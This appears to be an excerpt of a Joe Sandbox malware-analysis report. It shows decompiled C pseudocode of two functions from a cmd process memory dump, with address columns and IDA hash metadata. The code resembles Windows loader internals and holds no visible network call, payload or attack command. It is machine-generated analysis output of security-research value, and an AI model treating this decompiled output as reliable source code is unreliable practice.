                                                                                                                                          0x03be8706
                                                                                                                                          0x03be8709
                                                                                                                                          0x03be870b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8711
                                                                                                                                          0x03be8725
                                                                                                                                          0x03be8727
                                                                                                                                          0x03be872a
                                                                                                                                          0x03be872c
                                                                                                                                          0x03c39af0
                                                                                                                                          0x03c39af5
                                                                                                                                          0x03be8732
                                                                                                                                          0x03be8732
                                                                                                                                          0x03be8732
                                                                                                                                          0x03be8735
                                                                                                                                          0x03be8737
                                                                                                                                          0x03be8515
                                                                                                                                          0x03be8515
                                                                                                                                          0x03be8518
                                                                                                                                          0x03be851d
                                                                                                                                          0x03be8523
                                                                                                                                          0x03be8527
                                                                                                                                          0x03be852b
                                                                                                                                          0x03be8537
                                                                                                                                          0x03be8539
                                                                                                                                          0x03be853c
                                                                                                                                          0x03be853e
                                                                                                                                          0x03be868c
                                                                                                                                          0x03be8691
                                                                                                                                          0x03be8699
                                                                                                                                          0x03be869b
                                                                                                                                          0x03be8744
                                                                                                                                          0x03be8748
                                                                                                                                          0x03be86a1
                                                                                                                                          0x03be86a1
                                                                                                                                          0x03be86a1
                                                                                                                                          0x03be86a4
                                                                                                                                          0x03be86a8
                                                                                                                                          0x03c39bdf
                                                                                                                                          0x03c39bdf
                                                                                                                                          0x03be86ae
                                                                                                                                          0x03be86b0
                                                                                                                                          0x00000000
                                                                                                                                          0x03be86b6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39be9
                                                                                                                                          0x03be86b0
                                                                                                                                          0x03be8544
                                                                                                                                          0x03be854a
                                                                                                                                          0x03be854d
                                                                                                                                          0x03be8551
                                                                                                                                          0x03be876e
                                                                                                                                          0x03be8778
                                                                                                                                          0x03be877b
                                                                                                                                          0x03be8780
                                                                                                                                          0x03be8557
                                                                                                                                          0x03be8557
                                                                                                                                          0x03be855d
                                                                                                                                          0x03be855d
                                                                                                                                          0x03be856b
                                                                                                                                          0x03be856e
                                                                                                                                          0x03be8570
                                                                                                                                          0x03be8573
                                                                                                                                          0x03be8576
                                                                                                                                          0x03be8576
                                                                                                                                          0x03be8579
                                                                                                                                          0x03be857b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8581
                                                                                                                                          0x03be85a0
                                                                                                                                          0x03be85a2
                                                                                                                                          0x03be85a5
                                                                                                                                          0x03be85a7
                                                                                                                                          0x03c39b1b
                                                                                                                                          0x03c39b1b
                                                                                                                                          0x03be862e
                                                                                                                                          0x03be862e
                                                                                                                                          0x03be8631
                                                                                                                                          0x03be8631
                                                                                                                                          0x03be8634
                                                                                                                                          0x03be8636
                                                                                                                                          0x03be8669
                                                                                                                                          0x03be8669
                                                                                                                                          0x03be866b
                                                                                                                                          0x03c39bbf
                                                                                                                                          0x03c39bc4
                                                                                                                                          0x03c39bc8
                                                                                                                                          0x03c39bce
                                                                                                                                          0x03c39bce
                                                                                                                                          0x03be8671
                                                                                                                                          0x03be8671
                                                                                                                                          0x03be8674
                                                                                                                                          0x03be8676
                                                                                                                                          0x03c39bae
                                                                                                                                          0x03c39bae
                                                                                                                                          0x03be8676
                                                                                                                                          0x03be867c
                                                                                                                                          0x03be867e
                                                                                                                                          0x03be8688
                                                                                                                                          0x03be8688
                                                                                                                                          0x00000000
                                                                                                                                          0x03be867e
                                                                                                                                          0x03be8638
                                                                                                                                          0x03be8638
                                                                                                                                          0x03be863b
                                                                                                                                          0x03be863e
                                                                                                                                          0x03be863f
                                                                                                                                          0x03be8642
                                                                                                                                          0x03be8645
                                                                                                                                          0x03be8648
                                                                                                                                          0x03be864d
                                                                                                                                          0x03c39b69
                                                                                                                                          0x03c39b6e
                                                                                                                                          0x03c39b7b
                                                                                                                                          0x03c39b81
                                                                                                                                          0x03c39b85
                                                                                                                                          0x03c39b89
                                                                                                                                          0x03c39ba7
                                                                                                                                          0x03c39b8b
                                                                                                                                          0x03c39b91
                                                                                                                                          0x03c39b9a
                                                                                                                                          0x03c39b9f
                                                                                                                                          0x03c39b9f
                                                                                                                                          0x03be8788
                                                                                                                                          0x03be878d
                                                                                                                                          0x03be8763
                                                                                                                                          0x03be8763
                                                                                                                                          0x03be8766
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8766
                                                                                                                                          0x03c39b70
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39b70
                                                                                                                                          0x03be8656
                                                                                                                                          0x03be865a
                                                                                                                                          0x03be865c
                                                                                                                                          0x03be8752
                                                                                                                                          0x03be8756
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be875e
                                                                                                                                          0x00000000
                                                                                                                                          0x03be875e
                                                                                                                                          0x03be8662
                                                                                                                                          0x03be8662
                                                                                                                                          0x03be8662
                                                                                                                                          0x03be8666
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8666
                                                                                                                                          0x03be85b7
                                                                                                                                          0x03be85b9
                                                                                                                                          0x03be85bc
                                                                                                                                          0x03be85bf
                                                                                                                                          0x03be85cc
                                                                                                                                          0x03be85d1
                                                                                                                                          0x03be85d4
                                                                                                                                          0x03be85db
                                                                                                                                          0x03be85de
                                                                                                                                          0x03be85e0
                                                                                                                                          0x03c39b5f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39b5f
                                                                                                                                          0x03be85e6
                                                                                                                                          0x03be85ea
                                                                                                                                          0x03be86c3
                                                                                                                                          0x03be86c5
                                                                                                                                          0x03be86c8
                                                                                                                                          0x03be86ca
                                                                                                                                          0x03c39b16
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39b16
                                                                                                                                          0x03be86d6
                                                                                                                                          0x03be85f6
                                                                                                                                          0x03be85f6
                                                                                                                                          0x03be85f9
                                                                                                                                          0x03be8602
                                                                                                                                          0x03be8606
                                                                                                                                          0x03be860a
                                                                                                                                          0x03be860b
                                                                                                                                          0x03be860e
                                                                                                                                          0x03be8611
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8611
                                                                                                                                          0x03be85f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03be85f3
                                                                                                                                          0x03be8619
                                                                                                                                          0x03be861e
                                                                                                                                          0x03be861e
                                                                                                                                          0x03be8621
                                                                                                                                          0x03be8622
                                                                                                                                          0x03be8623
                                                                                                                                          0x03be8625
                                                                                                                                          0x03be862c
                                                                                                                                          0x00000000
                                                                                                                                          0x03be873d
                                                                                                                                          0x00000000
                                                                                                                                          0x03be873d
                                                                                                                                          0x03be8737
                                                                                                                                          0x03be850f
                                                                                                                                          0x03be8512
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8512
                                                                                                                                          0x00000000
                                                                                                                                          0x03be84d6

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 426998f1d734a4393a83ff1ab10f411d1be6895641da3955dc2845eac012c64d
                                                                                                                                          • Instruction ID: f20b03465a4d4b1adc5d0d4f976afc54349acd5c558e5531d6a9a0e83a95e088
                                                                                                                                          • Opcode Fuzzy Hash: 426998f1d734a4393a83ff1ab10f411d1be6895641da3955dc2845eac012c64d
                                                                                                                                          • Instruction Fuzzy Hash: CAB17974E00709DFDB24DFA8C984AADFBB9FF49708F1441A9E415EB245DB70A941CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0513A Relevance: .3, Instructions: 258COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                          			E03C0513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3ccd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E03C1D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03BF2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03BF4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E03C1F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E03BEFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x3ccb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E03C1B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                                          0x03c05142
                                                                                                                                          0x03c0514c
                                                                                                                                          0x03c05150
                                                                                                                                          0x03c05157
                                                                                                                                          0x03c05159
                                                                                                                                          0x03c0515e
                                                                                                                                          0x03c05165
                                                                                                                                          0x03c05169
                                                                                                                                          0x03c0516c
                                                                                                                                          0x03c05172
                                                                                                                                          0x03c05176
                                                                                                                                          0x03c0517a
                                                                                                                                          0x03c0517a
                                                                                                                                          0x03c0517a
                                                                                                                                          0x03c0517f
                                                                                                                                          0x03c46d8b
                                                                                                                                          0x03c46d8e
                                                                                                                                          0x03c46d91
                                                                                                                                          0x03c46d95
                                                                                                                                          0x03c46d98
                                                                                                                                          0x03c46d9c
                                                                                                                                          0x03c46da0
                                                                                                                                          0x03c46da3
                                                                                                                                          0x03c46da7
                                                                                                                                          0x03c46e26
                                                                                                                                          0x03c46e26
                                                                                                                                          0x03c46e2a
                                                                                                                                          0x03c051f9
                                                                                                                                          0x03c051f9
                                                                                                                                          0x03c051fe
                                                                                                                                          0x03c46e33
                                                                                                                                          0x03c46e33
                                                                                                                                          0x03c46e39
                                                                                                                                          0x03c46e3d
                                                                                                                                          0x03c46e46
                                                                                                                                          0x03c46e50
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46e52
                                                                                                                                          0x03c46e53
                                                                                                                                          0x03c46e56
                                                                                                                                          0x03c46e5d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46e5f
                                                                                                                                          0x03c46e67
                                                                                                                                          0x03c46e77
                                                                                                                                          0x03c46e7f
                                                                                                                                          0x03c46e80
                                                                                                                                          0x03c46e88
                                                                                                                                          0x03c46e90
                                                                                                                                          0x03c46e9f
                                                                                                                                          0x03c46ea5
                                                                                                                                          0x03c46ea9
                                                                                                                                          0x03c46eb1
                                                                                                                                          0x03c46ebf
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46ecf
                                                                                                                                          0x03c46ed3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46edb
                                                                                                                                          0x03c46ede
                                                                                                                                          0x03c46ee1
                                                                                                                                          0x03c46ee8
                                                                                                                                          0x03c46eeb
                                                                                                                                          0x03c46eed
                                                                                                                                          0x03c46ef0
                                                                                                                                          0x03c46ef4
                                                                                                                                          0x03c46ef8
                                                                                                                                          0x03c46efc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46f0d
                                                                                                                                          0x03c46f11
                                                                                                                                          0x03c46f32
                                                                                                                                          0x03c46f37
                                                                                                                                          0x03c46f3b
                                                                                                                                          0x03c46f3e
                                                                                                                                          0x03c46f41
                                                                                                                                          0x03c46f46
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46f4c
                                                                                                                                          0x03c46f50
                                                                                                                                          0x03c46f50
                                                                                                                                          0x03c46f54
                                                                                                                                          0x03c46f62
                                                                                                                                          0x03c46f65
                                                                                                                                          0x03c46f6d
                                                                                                                                          0x03c46f7b
                                                                                                                                          0x03c46f7b
                                                                                                                                          0x03c46f93
                                                                                                                                          0x03c46f98
                                                                                                                                          0x03c46fa0
                                                                                                                                          0x03c46fa6
                                                                                                                                          0x03c46fb3
                                                                                                                                          0x03c46fb6
                                                                                                                                          0x03c46fbf
                                                                                                                                          0x03c46fc1
                                                                                                                                          0x03c46fd5
                                                                                                                                          0x03c46fda
                                                                                                                                          0x03c46fda
                                                                                                                                          0x03c46fdd
                                                                                                                                          0x03c46fe2
                                                                                                                                          0x03c46fe7
                                                                                                                                          0x03c46feb
                                                                                                                                          0x03c46fef
                                                                                                                                          0x03c46ff3
                                                                                                                                          0x03c0520c
                                                                                                                                          0x03c0520c
                                                                                                                                          0x03c0520f
                                                                                                                                          0x03c05215
                                                                                                                                          0x03c05234
                                                                                                                                          0x03c0523a
                                                                                                                                          0x03c0523a
                                                                                                                                          0x03c05244
                                                                                                                                          0x03c05245
                                                                                                                                          0x03c05246
                                                                                                                                          0x03c05251
                                                                                                                                          0x03c05251
                                                                                                                                          0x03c46f13
                                                                                                                                          0x03c46f17
                                                                                                                                          0x03c46f17
                                                                                                                                          0x03c46f18
                                                                                                                                          0x03c46f1b
                                                                                                                                          0x03c46f1f
                                                                                                                                          0x03c46f23
                                                                                                                                          0x00000000
                                                                                                                                          0x03c46f28
                                                                                                                                          0x03c05204
                                                                                                                                          0x03c05204
                                                                                                                                          0x03c05208
                                                                                                                                          0x00000000
                                                                                                                                          0x03c05208
                                                                                                                                          0x03c05185
                                                                                                                                          0x03c05188
                                                                                                                                          0x03c0518a
                                                                                                                                          0x03c0518e
                                                                                                                                          0x03c05195
                                                                                                                                          0x03c46db1
                                                                                                                                          0x03c46db5
                                                                                                                                          0x03c46db9
                                                                                                                                          0x03c0519b
                                                                                                                                          0x03c0519b
                                                                                                                                          0x03c0519e
                                                                                                                                          0x03c051a7
                                                                                                                                          0x03c051a9
                                                                                                                                          0x03c051a9
                                                                                                                                          0x03c051b5
                                                                                                                                          0x03c051b8
                                                                                                                                          0x03c051bb
                                                                                                                                          0x03c051be
                                                                                                                                          0x03c051c1
                                                                                                                                          0x03c051c5
                                                                                                                                          0x03c051c9
                                                                                                                                          0x03c051cd
                                                                                                                                          0x03c051cd
                                                                                                                                          0x03c051d8
                                                                                                                                          0x03c051dc
                                                                                                                                          0x03c051e0
                                                                                                                                          0x03c46dcc
                                                                                                                                          0x03c46dd0
                                                                                                                                          0x03c46dd5
                                                                                                                                          0x03c46ddd
                                                                                                                                          0x03c46de1
                                                                                                                                          0x03c46de1
                                                                                                                                          0x03c46de5
                                                                                                                                          0x03c46deb
                                                                                                                                          0x03c46df1
                                                                                                                                          0x03c46df7
                                                                                                                                          0x03c46dfd
                                                                                                                                          0x03c46e01
                                                                                                                                          0x03c46e05
                                                                                                                                          0x03c46e09
                                                                                                                                          0x03c46e0d
                                                                                                                                          0x03c46e11
                                                                                                                                          0x03c46e11
                                                                                                                                          0x03c051eb
                                                                                                                                          0x03c46e1a
                                                                                                                                          0x03c46e1f
                                                                                                                                          0x03c46e21
                                                                                                                                          0x03c46e23
                                                                                                                                          0x00000000
                                                                                                                                          0x03c051f1
                                                                                                                                          0x03c051f1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c051f1

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 56a1e14d94f34b14836ed3644748d44a62de15c96bfa260d7405843f18aa9828
                                                                                                                                          • Instruction ID: 87f91a96aaa35772c08524342abb9e1f4a791fc1a31bbf5bebc57e9d2125c6d0
                                                                                                                                          • Opcode Fuzzy Hash: 56a1e14d94f34b14836ed3644748d44a62de15c96bfa260d7405843f18aa9828
                                                                                                                                          • Instruction Fuzzy Hash: 25C100755083809FD754CF28C580A6AFBE1BF89304F184A6EF999CB392D771E945CB42
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C003E2 Relevance: .3, Instructions: 254COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                          			E03C003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x3ccd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03C00548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E03C1B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E03BEB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3cc7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03BF7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03BF7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03C57016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03C19830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E03C569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3cc7c04 != 0) {
						_t118 = _v12;
						_t120 = E03C5A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3cc7bd8;
						if( *0x3cc7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E03C195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E03C199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03C53540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E03BDB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E03C1AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3cc8474 - 3;
										if( *0x3cc8474 != 3) {
											 *0x3cc79dc =  *0x3cc79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03BF7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03BF7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03C57016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3cc8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3cc7b00; // 0x0
							asm("ror esi, cl");
							 *0x3ccb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E03C195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03BE7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                                          0x03c003f1
                                                                                                                                          0x03c003f7
                                                                                                                                          0x03c003f9
                                                                                                                                          0x03c003fb
                                                                                                                                          0x03c003fd
                                                                                                                                          0x03c00400
                                                                                                                                          0x03c0040a
                                                                                                                                          0x03c44c7a
                                                                                                                                          0x03c00537
                                                                                                                                          0x03c00547
                                                                                                                                          0x03c00410
                                                                                                                                          0x03c00410
                                                                                                                                          0x03c00414
                                                                                                                                          0x03c00417
                                                                                                                                          0x03c0041a
                                                                                                                                          0x03c00421
                                                                                                                                          0x03c00424
